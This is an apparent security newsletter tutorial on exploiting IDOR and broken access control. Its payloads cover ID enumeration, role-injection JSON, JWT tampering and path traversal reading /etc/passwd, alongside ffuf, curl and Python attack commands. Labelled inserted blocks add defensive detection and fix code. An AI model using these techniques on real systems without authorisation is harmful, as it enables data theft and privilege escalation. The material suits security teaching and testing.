Break the Web (Week 3): Access Control & IDOR

Access Control & IDOR Exploitation: Step-by-Step Tutorial with Burp Suite, ffuf & Authorization Testing

🎯 Week 3: Access Control & IDOR

Break the Web: Part 3 of 8

Welcome back to Offensive Tuesday.

Hey 👋

Last week you broke authentication. You brute-forced passwords, hijacked sessions, and cracked JWT tokens. If you missed it, catch up here 👉 week 1, week 2

This week? We're exploiting access control.

Here's the thing — just because you're logged in doesn't mean you should see everything. But most apps? They forget to check.

You change one number in a URL. Boom — you're viewing someone else's data.

You modify an API request. Suddenly you're an admin.

This is IDOR (Insecure Direct Object Reference) and broken access control — the #1 vulnerability on the OWASP Top 10.

Today you're learning how to exploit it.

Let's break some authorization. 🔓

🧠 What is Access Control?

Access control decides what you can do after you log in.

Think of it like this:

  • Authentication = proving who you are (last week)

  • Authorization = what you're allowed to access (this week)

Three types:

  1. Horizontal — Users at the same level (user A can't access user B's data)

  2. Vertical — Different privilege levels (regular user can't access admin panel)

  3. Context-dependent — Based on state or workflow (can't edit after approval)

Your goal: access stuff you shouldn't.

🔓 What is IDOR?

Insecure Direct Object Reference = when an app exposes a direct reference to internal objects (like IDs) without checking if you're allowed to access them.

Example:

https://bank.com/account?id=1234

You're user 1234. What happens if you change it to id=1235?

If the app doesn't check permissions → you just accessed someone else's account.

That's IDOR.

🔧 The Attack Process

Step 1: Map Your Own Resources

First, understand what YOU have access to as a legitimate user.

Open the app and note down:

  • Your profile URL

  • Your documents/files

  • Your API endpoints

  • Your account settings

Example endpoints:

GET /api/user/profile?id=42
GET /api/orders/12345
GET /files/document/789
DELETE /api/user/42

Take screenshots, save requests in Burp Suite.

Step 2: Identify Object References

Look for predictable identifiers:

✅ Sequential numbers: id=1, id=2, id=3
✅ UUIDs: 550e8400-e29b-41d4-a716-446655440000
✅ Usernames: user=john, user=admin
✅ Emails: [email protected]
✅ Encoded values: Base64, hex, etc.

Where to find them:

  • URLs (/profile?user_id=123)

  • POST body parameters

  • JSON API responses

  • Cookies

  • Hidden form fields

Using Burp Suite:

  1. Turn on Proxy intercept

  2. Browse the app normally

  3. Watch for ID parameters in HTTP History

  4. Right-click → Send to Repeater (Ctrl+R)

Step 3: Test Horizontal Access Control

Goal: Access another user's data at your privilege level.

Attack #1: Sequential ID Manipulation

Your profile:

GET /api/user/profile?id=1042

Try:

GET /api/user/profile?id=1043
GET /api/user/profile?id=1041
GET /api/user/profile?id=1000

Look for different data in responses.

Attack #2: Parameter Pollution

Add extra parameters:

GET /api/user/profile?id=1042&id=1000
GET /api/user/profile?id=1042&user_id=admin

Attack #3: HTTP Method Tampering

If GET is protected, try others:

POST /api/user/1042
PUT /api/user/1042
DELETE /api/user/1042
PATCH /api/user/1042

Attack #4: JSON Parameter Injection

Original request:

POST /api/updateProfile
{
  "user_id": 1042,
  "email": "[email protected]"
}

Try adding admin fields:

{
  "user_id": 1042,
  "email": "[email protected]",
  "role": "admin",
  "is_admin": true
}

Step 4: Test Vertical Access Control

Goal: Escalate from regular user to admin.

Attack #1: Direct URL Access

Try common admin paths:

/admin
/administrator
/admin.php
/admin/dashboard
/api/admin/users
/panel
/control

Use ffuf to discover hidden admin endpoints:

ffuf -w /usr/share/seclists/Discovery/Web-Content/common.txt -u https://target.com/FUZZ -fc 404

Get SecLists here.

Attack #2: Role Parameter Manipulation

Intercept your requests and add:

role=admin
isAdmin=true
admin=1
privilege=admin
user_type=administrator

Check your JWT payload:

{
  "user": "john",
  "role": "user",
  "admin": false
}

Change to:

{
  "user": "john",
  "role": "admin",
  "admin": true
}

Re-encode and replace token.

Attack #3: Referer Header Bypass

Some apps only check if you came from an admin page.

Add this header:

Referer: https://target.com/admin/dashboard

Step 5: Test Path Traversal in IDs

Sometimes IDs reference files or paths.

GET /download?file=invoice_1042.pdf

Try:

GET /download?file=../../../etc/passwd
GET /download?file=invoice_1043.pdf
GET /download?file=../../admin/secrets.txt

Step 6: Automate IDOR Testing

Using Burp Suite Intruder:

  1. Capture request with ID parameter

  2. Send to Intruder (Ctrl+I)

  3. Mark the ID value: id=§1042§

  4. Set payload type to "Numbers" (1-10000)

  5. Start attack

  6. Filter by response length or status code

Using ffuf:

ffuf -w ids.txt -u https://target.com/api/user/FUZZ -H "Cookie: session=YOUR_SESSION"

Create ids.txt:

1
2
3
...
10000

Using Python script:

import requests

session = "your_session_cookie_here"
headers = {"Cookie": f"session={session}"}

for user_id in range(1, 1000):
    # Same session for every id; a timeout stops one slow response from hanging the loop
    r = requests.get(f"https://target.com/api/user/{user_id}", headers=headers, timeout=10)
    if r.status_code == 200:
        print(f"[+] Found: User {user_id}")
        try:
            print(r.json())
        except ValueError:
            # Not every 200 carries a JSON body; fall back to the raw text
            print(r.text)
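Status codes alone miss a lot: many apps answer 200 for every id. The check that actually proves the horizontal IDOR from Step 3, and that an automated run like Step 6 should make, is whether two different sessions receive the same object. This added example (not from the newsletter) runs that two-session comparison against a constructed in-memory endpoint, once with the ownership check missing and once with it present; the profiles, sessions and function names are assumptions for the demo.

```python
from typing import Callable, Dict, List, Optional, Tuple

# Constructed in-memory stand-in for the target API (assumption: not any real app).
PROFILES: Dict[int, dict] = {
    1041: {"id": 1041, "email": "alice@example.test"},
    1042: {"id": 1042, "email": "bob@example.test"},
    1043: {"id": 1043, "email": "carol@example.test"},
}
SESSIONS = {"sess-bob": 1042, "sess-carol": 1043}  # session cookie -> user id

Response = Tuple[int, Optional[dict]]  # (status code, JSON body)


def vulnerable_profile(session: str, user_id: int) -> Response:
    """GET /api/user/profile?id=... with the IDOR: authenticates the caller, never checks ownership."""
    if session not in SESSIONS:
        return 401, None
    rec = PROFILES.get(user_id)
    return (200, rec) if rec else (404, None)


def fixed_profile(session: str, user_id: int) -> Response:
    """Same endpoint with an object-level authorization check added."""
    if session not in SESSIONS:
        return 401, None
    if SESSIONS[session] != user_id:  # the caller may only read their own profile
        return 403, None
    rec = PROFILES.get(user_id)
    return (200, rec) if rec else (404, None)


def find_idor(endpoint: Callable[[str, int], Response], session_a: str,
              session_b: str, ids: List[int]) -> List[int]:
    """Replay every id under two different sessions. An id is reported when both
    sessions get 200 and identical bodies: the endpoint is not distinguishing callers."""
    leaked = []
    for uid in ids:
        status_a, body_a = endpoint(session_a, uid)
        status_b, body_b = endpoint(session_b, uid)
        if status_a == 200 and status_b == 200 and body_a == body_b:
            leaked.append(uid)
    return leaked
```

Against a real app, swap the endpoint callable for one that sends the HTTP request and returns `(status, body)`; the comparison logic is unchanged.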

Step 7: Test Mass Assignment

What is it? When an app binds all incoming parameters to internal objects without filtering.

Example vulnerable code:

user.update(request.POST)  # Dangerous!

Attack:

Original request:

POST /api/register
{
  "username": "newuser",
  "email": "[email protected]",
  "password": "pass123"
}

Try adding:

{
  "username": "newuser",
  "email": "[email protected]",
  "password": "pass123",
  "role": "admin",
  "is_verified": true,
  "credits": 999999
}
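Added example (not the newsletter's code): the `user.update(request.POST)` bug from Step 7 next to the allowlist fix, fed the registration payload above with the injected fields. The `User` class, field names and the request body are constructed for the demo; `unexpected_fields` is a hypothetical helper showing what a server can log to spot these probes.

```python
# Fields a client is allowed to set at registration; everything else is server-owned.
ALLOWED_REGISTER_FIELDS = {"username", "email", "password"}


class User:
    def __init__(self):
        self.username = None
        self.email = None
        self.password = None
        self.role = "user"        # privileged: must never be bound from client input
        self.is_verified = False
        self.credits = 0


def register_vulnerable(body: dict) -> User:
    """Mass assignment: binds every incoming key, like user.update(request.POST)."""
    user = User()
    for key, value in body.items():
        setattr(user, key, value)
    return user


def register_fixed(body: dict) -> User:
    """Binds only allowlisted keys; role, is_verified and credits keep their defaults."""
    user = User()
    for key, value in body.items():
        if key in ALLOWED_REGISTER_FIELDS:
            setattr(user, key, value)
    return user


def unexpected_fields(body: dict) -> set:
    """Detection helper: extra keys a client sent, worth logging as a mass-assignment probe."""
    return set(body) - ALLOWED_REGISTER_FIELDS


# Constructed request body: the Step 7 registration payload with the injected fields.
MALICIOUS_BODY = {
    "username": "newuser", "email": "newuser@example.test", "password": "pass123",
    "role": "admin", "is_verified": True, "credits": 999999,
}
```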

Step 8: Test Function-Level Access Control

Can you call admin functions as a regular user?

Example endpoints:

POST /api/deleteUser
POST /api/promoteUser
POST /api/resetPassword
GET /api/getAllUsers

Test them with your regular session token.

Using curl:

curl -X POST https://target.com/api/deleteUser \
  -H "Cookie: session=YOUR_SESSION" \
  -H "Content-Type: application/json" \
  -d '{"user_id": 1000}'

Step 9: Test for UUID/GUID Weaknesses

UUIDs look secure but aren't always:

550e8400-e29b-41d4-a716-446655440000

Attacks:

  1. Sequential UUIDs — Some systems generate predictable UUIDs

  2. Version 1 UUIDs — Contain timestamp + MAC address (can be enumerated)

  3. Information Leakage — Sometimes exposed in other endpoints

Try:

  • Increment/decrement hex values

  • Check if UUIDs are exposed in public endpoints

  • Use uuid-tools to analyze UUID versions
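Added example (not from the newsletter): a small UUID triage using only Python's standard `uuid` module, which tells you what Step 9 asks, the version, and for version 1 decodes the timestamp and node it leaks. The RFC 4122 DNS namespace UUID is used as a known version-1 sample alongside the version-4 UUID quoted above; `triage_uuid` is a hypothetical helper name.

```python
import uuid
from datetime import datetime, timezone

# Ticks (100 ns) between the UUID epoch, 1582-10-15, and the Unix epoch (RFC 4122).
_UUID_EPOCH_OFFSET = 0x01B21DD213814000


def uuid_v1_timestamp(u: uuid.UUID) -> datetime:
    """Decode the 60-bit version-1 timestamp into a UTC datetime."""
    unix_ticks = u.time - _UUID_EPOCH_OFFSET
    return datetime.fromtimestamp(unix_ticks / 1e7, tz=timezone.utc)


def triage_uuid(value: str) -> dict:
    """Report the UUID version and, for v1, the timestamp and node it exposes.
    A node whose multicast bit is set was randomly generated (RFC 4122 4.5), not a MAC."""
    u = uuid.UUID(value)
    info = {"version": u.version, "predictable": False}
    if u.version == 1:
        info["timestamp"] = uuid_v1_timestamp(u)
        info["node"] = f"{u.node:012x}"
        info["node_is_mac"] = not ((u.node >> 40) & 0x01)
        info["predictable"] = True  # time-ordered: neighbours can be enumerated
    elif u.version in (3, 5):
        info["note"] = "name-based hash: guessable only if the input name is guessable"
    elif u.version == 4:
        info["note"] = "random: 122 bits of entropy, not enumerable"
    return info


# Constructed samples: RFC 4122 DNS namespace (version 1) and the v4 UUID from the text.
SAMPLES = ["6ba7b810-9dad-11d1-80b4-00c04fd430c8", "550e8400-e29b-41d4-a716-446655440000"]

if __name__ == "__main__":
    for s in SAMPLES:
        print(s, triage_uuid(s))
```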

πŸ› οΈ Tool List

IDOR Testing:

Fuzzing & Discovery:

JWT Tools:

Scripting:

📚 Learning Resources

Reading:

That's Week 3. 🔥

Tomorrow (Wednesday): How to build proper access control and defend against IDOR.

Next Tuesday: Injection Attacks — we're breaking SQL and command injection wide open.

See you then.

— Zwire ✌️

P.S. Got questions? Reply to this email. I read everything.
